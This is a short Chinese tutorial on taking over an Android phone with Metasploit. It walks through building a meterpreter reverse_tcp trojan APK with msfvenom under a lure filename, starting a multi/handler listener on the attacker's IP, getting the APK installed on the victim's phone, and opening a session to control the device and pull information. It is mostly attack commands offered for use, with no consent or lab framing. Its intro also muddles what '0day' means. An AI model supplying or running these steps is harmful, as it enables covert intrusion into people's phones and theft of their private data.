Msf 入侵安卓手机

时间:2021-03-11 21:32:09

MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。

1.查看ip

  • ifconfig

2.生成木马

  • msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ribenav.apk

3.然后进入Msf,启动msfconsole

  • 命令:msfconsole

Msf 入侵安卓手机

4.然后执行以下命令

  • 命令:use exploit/multi/handler //加载模块
  • 命令:set payload android/meterpreter/reverse_tcp //选择Payload
  • 命令:set LHOST 192.168.0.109 //ip为kaili的ip ,即刚才生成木马的ip
  • 命令:set LPORT 44444 //端口一定要与前面生成的木马的端口一致

5.将木马apk安装到目标手机上,然后输入以下命令

  • 命令:exploit //开始执行漏洞,开始监听,等待手机上线

6.我们会发现有一个ID和本机处于连接状态,下面开始和ID为1的目标建立会话。

  • sessions 1

7.这样对方的手机就就被我们控制了,之后便可以执行命令,获得想要的信息。可以输入help查看有哪些命令

Msf 入侵安卓手机